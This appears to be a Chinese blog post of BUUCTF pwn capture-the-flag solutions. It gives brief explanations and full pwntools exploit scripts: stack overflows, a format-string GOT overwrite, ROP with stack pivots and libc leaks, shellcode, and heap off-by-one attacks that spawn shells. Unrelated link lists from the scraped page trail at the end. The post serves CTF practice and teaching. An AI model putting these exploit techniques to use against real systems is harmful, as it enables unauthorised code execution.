BUUCTF pwn一分题目
因为以前做过一些题目,看见1分题目也不太多了,就想着,抓紧点把1分题都刷一下吧。所以开个帖子记录一下,题目简单的话就只贴exp了。
[BJDCTF 2nd]secret
这里有一个输入可以进行溢出,name在bss段,下面有一个变量count
输入完名字会再次输入,会和一些值进行判断,如果能连续判断正确10000次,就可以拿到flag。这里每次判断正确一次,count这个变量会减一。
所以有两种做法:
1.将所有正确的值dump下来,然后写脚本,答完10000次,就拿到flag了。
2.将count的值覆盖成printf的got表,因为程序没有调用过printf,这里面其实存着的地址是printf@plt+6,假如我们可以把这里改成system@plt+6,第一次调用printf的时候就相当于解析了system的地址。
所以要求name的时候输入binsh字符串,就能直接拿到shell了。所以需要进行15次输入正确,1次输入错误,这样刚好减到system@plt+6在进行调用pritnf(system)。
我是铁憨憨,做的时候没想到方法二,就用方法一硬刚做出来了。。。贴一下方法2的exp吧:
1 from pwn import *
2
3 p = process('./secret')
4 elf = ELF('./secret')
5 context.log_level = 'debug'
6
7 a = [18283, 11576, 17728, 15991, 12642, 16253, 13690, 15605, 12190, 16874, 18648, 10083, 18252, 14345, 11875, 12106, 12952, 10483, 15643, 17566, 13096, 11682, 12950, 11677, 12091]
8
9 printf_got = elf.got['printf']
10 p.sendafter('name? ','/bin/sh\x00'+p64(0)+p32(printf_got))
11 for i in range(15):
12 p.sendafter('Secret: ',str(a[i]))
13 p.sendafter('Secret: ',str(0))
14 p.recv()
15 p.interactive()
picoctf_2018_buffer overflow 2
1 from pwn import *
2
3 p = process('./pwn')
4 context.log_level = 'debug'
5
6 target = 0x080485CB
7 main = 0x0804866D
8 payload = 'a'*0x6c+'bbbb'+p32(target)+p32(main)+p32(3735928559)+p32(3735929054)
9 p.sendlineafter(' string: \n',payload)
10 print p.recvuntil('}')[-0x30:]
[BJDCTF 2nd]r2t4
1 from pwn import *
2
3 p = process('./r2t4')
4 elf = ELF('./r2t4')
5 context(os='linux',arch='amd64',log_level='debug')
6
7 shell = 0x0400626
8
9 payload = fmtstr_payload(6,{elf.got['__stack_chk_fail']:0x0400626})
10 payload = payload.ljust(0x30,'a')
11 p.send(payload)
12 p.recv()
13 p.recv()
picoctf_2018_buffer overflow 1
1 from pwn import *
2
3 p = process('./pwn')
4 context.log_level = 'debug'
5
6 target = 0x080485CB
7 payload = 'a'*0x28+'bbbb'+p32(target)
8 p.sendlineafter(' string: \n',payload)
9 p.recv()
10 p.recv()
[BJDCTF 2nd]test
需要用ssh进行连接,找到了flag,但是cat失败,权限不够,不能读取,有一个test文件和test.c,这里可以看test的源代码
1 #include <stdio.h>
2 #include <string.h>
3 #include <stdlib.h>
4
5 int main(){
6 char cmd[0x100] = {0};
7 puts("Welcome to Pwn-Game by TaQini.");
8 puts("Your ID:");
9 system("id");
10 printf("$ ");
11 gets(cmd);
12 if( strstr(cmd, "n")
13 ||strstr(cmd, "e")
14 ||strstr(cmd, "p")
15 ||strstr(cmd, "b")
16 ||strstr(cmd, "u")
17 ||strstr(cmd, "s")
18 ||strstr(cmd, "h")
19 ||strstr(cmd, "i")
20 ||strstr(cmd, "f")
21 ||strstr(cmd, "l")
22 ||strstr(cmd, "a")
23 ||strstr(cmd, "g")
24 ||strstr(cmd, "|")
25 ||strstr(cmd, "/")
26 ||strstr(cmd, "$")
27 ||strstr(cmd, "`")
28 ||strstr(cmd, "-")
29 ||strstr(cmd, "<")
30 ||strstr(cmd, ">")
31 ||strstr(cmd, ".")){
32 exit(0);
33 }else{
34 system(cmd);
35 }
36 return 0;
37 }
可以看到是ban了一些字符串的,n e p b u s h i f l a g和一些符号都不能出现在cmd字符串中。这题考得应该是linux操作。进入usr文件夹,在bin文件夹下可以看到我们可以执行的linux命令:
这里需要筛选一下:ls | grep -v -E "n|e|p|b|u|s|h|i|f|l|a|g"
解释一下,这里是-E是将样式为延伸的正则表达式来使用,-v是显示不包含匹配文本的所有行。
更多使用方法:入口
这里可以看到剩下的一些命令,其中我们可以用的有od和x86_64。
Linux od命令用于输出文件内容。
od指令会读取所给予的文件的内容,并将其内容以八进制字码呈现出来。
至于x86_64这个命令,我到现在也不知道是做什么的,但是执行这个命令会和"/binsh"和"sh"一样,返回一个shell。
这里就直接用这个命令拿shell来读取flag了。
ciscn_2019_s_4
leak栈地址,然后在栈上布置rop,栈转移在迁会到栈上继续执行拿shell。
1 from pwn import *
2
3 p = process('./pwn')
4 elf = ELF('./pwn')
5 context.log_level = 'debug'
6
7 ret = 0x080483a6
8 leave_ret = 0x080485FD
9
10 p.sendafter('name?\n','a'*0x2f+'b')
11 sleep(0.2)
12 p.recvuntil('b')
13 p.recv(4)
14 stack = u32(p.recv(4))-0x50
15 print 'stack-->'+hex(stack)
16
17 payload = p32(ret)+p32(elf.plt['system'])+p32(elf.symbols['main'])+p32(stack+0x10)
18 payload += '/bin/sh\x00'
19 payload = payload.ljust(0x28,'\x00')
20 payload += p32(stack)+p32(leave_ret)
21
22 p.send(payload)
23 p.recv()
24 p.interactive()
wustctf2020_getshell_2
32位程序,程序中有system,有"sh"字符串。做题的时候憨憨了,能溢出0xc字节的大小,0x4覆盖ebp,0x4覆盖返回地址,只剩下0x4大小的空间能写了。
刚开始时候一直写的是payload='a'*0x18+'bbbb'+p32(system_plt)+p32(main)+p32(sh_addr),发现打不通,原来是不能这么进行调用,需要借助程序中的代码段来执行。
payload='a'*0x18+'bbbb'+p32(call_system)+p32(sh_addr),这样执行syscall的话,参数就在栈上,会取出sh来执行。
1 from pwn import *
2
3 p = process('./pwn')
4 elf = ELF('./pwn')
5 p = remote('node3.buuoj.cn',26446)
6 context.log_level = 'debug'
7
8 sh = 0x08048670
9 call_system = 0x08048529
10
11 payload = 'a'*0x18+'bbbb'+p32(call_system)+p32(sh)
12 p.send(payload)
13 p.recv()
14 p.interactive()
mrctf2020_easyoverflow
1 from pwn import *
2
3 p = process('./pwn')
4 context.log_level = 'debug'
5
6 payload = 'a'*0x30+'n0t_r3@11y_f1@g\x00'
7 p.sendline(payload)
8 p.interactive()
mrctf2020_shellcode
说实话,憨憨的读了题目,憨憨的搜了wp,憨憨的写了exp,憨憨的就通了。。。有点看不懂。。。程序执行了read(0,buf,0x400),然后就call buf
1 from pwn import *
2
3 p = process('./pwn')
4 context(os='linux',arch='amd64',log_level='debug')
5
6 shell=asm(shellcraft.amd64.linux.sh())
7 p.sendline(shell)
8 p.interactive()
pwnable_orw
程序有沙箱保护,只能调用open read write来输出flag。这种写shellcode的方式可以学习一下。
1 from pwn import *
2
3 p = process('./orw')
4 elf = ELF('./orw')
5 context.log_level = 'debug'
6
7 buf = 0x0804A060+0x200
8
9 shellcode = shellcraft.open('./flag')
10 shellcode += shellcraft.read('eax',buf,100)
11 shellcode += shellcraft.write(1,buf,100)
12 shellcode = asm(shellcode)
13 p.recv()
14 p.send(shellcode)
15 print p.recvuntil('}')
actf_2019_babystack
1 from pwn import *
2
3 p = process(['./pwn'],env={'LD_PRELOAD':'./libc-2.27-buu.so'})
4 elf = ELF('./pwn')
5 libc = ELF('./libc-2.27-buu.so')
6 context.log_level = 'debug'
7
8 p.sendlineafter('message?\n',str(0xE0))
9 p.recvuntil('at ')
10 stack_addr = int(p.recv(14),16)
11 print 'stack_addr-->'+hex(stack_addr)
12
13 pop_rdi = 0x00400ad3
14 pop_rsi_r15 = 0x00400ad1
15 leave_ret = 0x0400A18
16 og = [0x4f2c5,0x4f322,0xe569f,0xe585f,0xe5858,0xe5863,0x10a38c,0x10a398]
17 call_puts = 0x04009DA
18
19 payload = p64(pop_rdi)+p64(elf.got['puts'])
20 payload += p64(elf.plt['puts'])+p64(pop_rsi_r15)
21 payload += p64(elf.got['puts'])+p64(0)
22 payload += p64(pop_rdi)+p64(0)+p64(elf.plt['read'])
23 payload += p64(call_puts)
24 payload = payload.ljust(0xd0,'\x00')
25 payload += p64(stack_addr-0x8)+p64(leave_ret)
26 p.sendafter('>',payload)
27 libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.symbols['puts']
28 shell = libc_base+og[6]
29 print 'libc_base-->'+hex(libc_base)
30
31 payload = p64(shell)
32 p.send(payload)
33 p.interactive()
roarctf_2019_easy_pwn
如果卡时间的话,我应该是参加了这次比赛的。太菜了,当时啥也不会。
off by one,free的时候看的是size字段,构造堆块重叠,让两个指针指向同一个堆快,就可以进行常规操作了。
1 from pwn import *
2
3 p = process(['./pwn'],env={"LD_PRELOAD":"./libc-2.23.so"})
4 #p = process('./pwn')
5 elf = ELF('./pwn')
6 #libc = ELF('./libc.so.6')
7 libc = ELF('./libc-2.23.so')
8 context.log_level = 'debug'
9
10 def duan():
11 gdb.attach(p)
12 pause()
13 def add(size):
14 p.sendlineafter('choice: ','1')
15 p.sendlineafter('size: ',str(size))
16 def edit(index,size,content):
17 p.sendlineafter('choice: ','2')
18 p.sendlineafter('index: ',str(index))
19 p.sendlineafter('size: ',str(size))
20 p.sendafter('content: ',content)
21 def delete(index):
22 p.sendlineafter('choice: ','3')
23 p.sendlineafter('index: ',str(index))
24 def show(index):
25 p.sendlineafter('choice: ','4')
26 p.sendlineafter('index: ',str(index))
27
28 #og = [0x45226,0x4527a,0xf0364,0xf1207]
29 og = [0x45216,0x4526a,0xf02a4,0xf1147]
30
31 add(0x18) #0
32 add(0x70) #1
33 add(0x60) #2
34 add(0x10) #3
35 edit(0,0x18+10,'a'*0x18+'\xf1')
36 delete(1)
37 add(0x70)
38 show(2)
39 libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.symbols['__malloc_hook']-0x10-88
40 print 'libc_base-->'+hex(libc_base)
41 __malloc_hook = libc_base+libc.symbols['__malloc_hook']
42 shell = libc_base+og[1]
43 realloc = libc_base+libc.symbols['realloc']
44
45 add(0x60)
46 delete(2)
47 edit(4,0x8,p64(__malloc_hook-0x23))
48 add(0x60)
49 add(0x60)
50 payload = 'a'*(0x13-8)+p64(shell)+p64(realloc+3)
51 edit(5,len(payload),payload)
52 add(0x10)
53 p.interactive()
hitcontraining_heapcreator
off by one,控制chunk指针,打got表。
1 from pwn import *
2
3 p = process('./pwn')
4 elf = ELF('./pwn')
5 libc = ELF('./libc.so.6')
6
7 #context(os='linux',arch='i386',log_level='debug')
8 context(os='linux',arch='amd64',log_level='debug')
9
10 def duan():
11 gdb.attach(p)
12 pause()
13 def add(size,content):
14 p.sendlineafter('choice :','1')
15 p.sendlineafter('Heap : ',str(size))
16 p.sendafter('heap:',content)
17 def edit(index,content):
18 p.sendlineafter('choice :','2')
19 p.sendlineafter('Index :',str(index))
20 p.sendafter('heap : ',content)
21 def delete(index):
22 p.sendlineafter('choice :','4')
23 p.sendlineafter('Index :',str(index))
24 def show(index):
25 p.sendlineafter('choice :','3')
26 p.sendlineafter('Index :',str(index))
27
28 add(0x80,'aaaaaaaa')
29 add(0x18,'bbbbbbbb')
30 delete(0)
31 add(0x80,'aaaaaaaa')
32 show(0)
33 libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-88-0x10-libc.symbols['__malloc_hook']
34 print 'libc_base-->'+hex(libc_base)
35 system = libc_base + libc.symbols['system']
36 add(0x18,'cccccccc')
37 add(0x18,'dddddddd')
38 edit(1,'a'*0x18+'\x80')
39 delete(2)
40 add(0x70,'zzzzzzzz'*3+p64(0x21)+p64(0x70)+p64(elf.got['atoi']))
41 edit(2,p64(system))
42 p.sendlineafter('choice :','/bin/sh\x00')
43 p.interactive()
ciscn_2019_n_3
第一次做32位的堆题,卡了一会儿。
1.申请string类型的note
2.申请int类型的note
3.free掉note0和note1,再申请0xc大小的int类型的note,此时就可以控制chunk0的show和delete指针了,在show处填"sh\x00\x00",在delete处写system_plt,再free掉chunk0就拿到shell了。
1 from pwn import *
2
3 p = process('./pwn')
4 elf = ELF('./pwn')
5 context.log_level = 'debug'
6
7 def duan():
8 gdb.attach(p)
9 pause()
10 def add(index,note_type,content,size=0):
11 p.sendlineafter('CNote > ','1')
12 p.sendlineafter('Index > ',str(index))
13 p.sendlineafter('Text\n',str(note_type))
14 if note_type==1:
15 p.sendlineafter('Value > ',content)
16 if note_type==2:
17 p.sendlineafter('Length > ',str(size))
18 p.sendlineafter('Value > ',content)
19 def delete(index):
20 p.sendlineafter('CNote > ','2')
21 p.sendlineafter('Index > ',str(index))
22 def show(index):
23 p.sendlineafter('CNote > ','3')
24 p.sendlineafter('Index > ',str(index))
25
26 add(0,2,'aaaa',0x20)
27 add(1,1,str(0x1234))
28 delete(0)
29 delete(1)
30 add(2,2,'sh'+'\x00'*2+p32(elf.plt['system']),0xc)
31 delete(0)
32 p.interactive()
BUUCTF pwn一分题目的更多相关文章
- [BUUCTF]PWN——babyheap_0ctf_2017
[BUUCTF]PWN--babyheap_0ctf_2017 附件 步骤: 例行检查,64位,保护全开 试运行一下程序,看到这个布局菜单,知道了这是一道堆的题目,第一次接触堆的小伙伴可以去看一下这个 ...
- BUUCTF PWN部分题目wp
pwn好难啊 PWN 1,连上就有flag的pwnnc buuoj.cn 6000得到flag 2,RIP覆盖一下用ida分析一下,发现已有了system,只需覆盖RIP为fun()的地址,用peda ...
- (buuctf) - pwn入门部分wp - rip -- pwn1_sctf_2016
[buuctf]pwn入门 pwn学习之路引入 栈溢出引入 test_your_nc [题目链接] 注意到 Ubuntu 18, Linux系统 . nc 靶场 nc node3.buuoj.cn 2 ...
- buuctf --pwn part2
pwn难啊! 1.[OGeek2019]babyrop 先check一下文件,开启了NX 在ida中没有找到system.'/bin/sh'等相关的字符,或许需要ROP绕过(废话,题目提示了) 查看到 ...
- [BUUCTF]PWN——[V&N2020 公开赛]simpleHeap
[V&N2020 公开赛]simpleHeap 附件 步骤: 例行检查,64位,保护全开 根据题目可知是一道堆,直接用64位ida打开 我修改了这些函数的名称,这样方便看程序 add,我们可以 ...
- [BUUCTF]PWN——[V&N2020 公开赛]warmup
[V&N2020 公开赛]warmup 附件 步骤: 例行检查,64位程序,除了canary,其他保护都开 本地运行一下,看看大概的情况 64位ida载入,从main函数开始看程序 看到程序将 ...
- [BUUCTF]PWN——ez_pz_hackover_2016
ez_pz_hackover_2016 题目附件 解题步骤: 例行检查,32位,开启了RELRO保护,二进制的保护机制看这里 由于没有开启nx保护,对于这题一开始想到的是利用写入shellcode来获 ...
- [BUUCTF]PWN——bjdctf_2020_babyrop
bjdctf_2020_babyrop[64位libc泄露] 题目附件 解题步骤: 例行检查,64位程序,开启了NX保护 试运行一下程序,看看大概的情况,看提示,应该是道泄露libc的题目 64位id ...
- [BUUCTF]PWN——铁人三项(第五赛区)_2018_rop
铁人三项(第五赛区)_2018_rop[32位libc泄露] 题目附件 解题步骤: 例行检查,32位,开启了NX保护 试运行一下程序,一开始让我们输入,然后直接输出"Hellow,world ...
随机推荐
- Python科普系列——类与方法(下篇)
书接上回,继续来讲讲关于类及其方法的一些冷知识和烫知识.本篇将重点讲讲类中的另一个重要元素--方法,也和上篇一样用各种神奇的例子,从原理和机制的角度为你还原一个不一样的Python.在阅读本篇之前,推 ...
- SSM整合小项目
1.文件目录结构 2.MyBatis配置 创建数据库环境 CREATE DATABASE `ssmbuild`; USE `ssmbuild`; DROP TABLE IF EXISTS `books ...
- pytest-rerunfailures/pytest-repeat重跑插件
在测试中,我们会经常遇到这种情况,由于环境等一些原因,一条case运行5次,只有两次成功 其它三次失败,针对这种概率性成功或失败,若是我们每次都运行一次就比较耗时间,这个时候 就需要pytest提供的 ...
- C/C++ Qt Tree与Tab组件实现分页菜单
虽然TreeWidget组件可以实现多节点的增删改查,但多节点操作显然很麻烦,在一般的应用场景中基本上只使用一层结构即可解决大部分开发问题,TreeWidget组件通常可配合TabWidget组件,实 ...
- CF1290E Cartesian Tree
考虑笛卡尔树的意义: 一个点在笛卡尔树中的子树,代表以他为最小/最大值的区间. 所以一个点的子树大小,一定是类似到达序列边界或者被一个比他更大的数隔离. 考虑记录 \(l_i,r_i\) 为第 \(i ...
- Python基础笔记4
模块 模块是一组Python代码的集合,一个.py文件就称之为一个模块(Module),按目录来组织模块称为包(Package).优点:提高了代码的可维护性:避免函数名和变量名冲突. mycompan ...
- NextDenovo 组装基因组
NextDenovo 是有武汉未来组团队开发出来用于组装ONT,Pacbio, HIFI (默认参数可对60-100X数据更有效),可通过correct--assemble对其进行组装.组装后,每个碱 ...
- C#集合Dictionary中按值的排序
C#集合Dictionary中按值的降序排列 static void Main(string[] args) { Dictionary<string, int> d ...
- Hadoop入门 集群常用知识与常用脚本总结
目录 集群常用知识与常用脚本总结 集群启动/停止方式 1 各个模块分开启动/停止(常用) 2 各个服务组件逐一启动/停止 编写Hadoop集群常用脚本 1 Hadoop集群启停脚本myhadoop.s ...
- A Child's History of England.27
Then, the Red King went over to Normandy, where the people suffered greatly under the loose rule of ...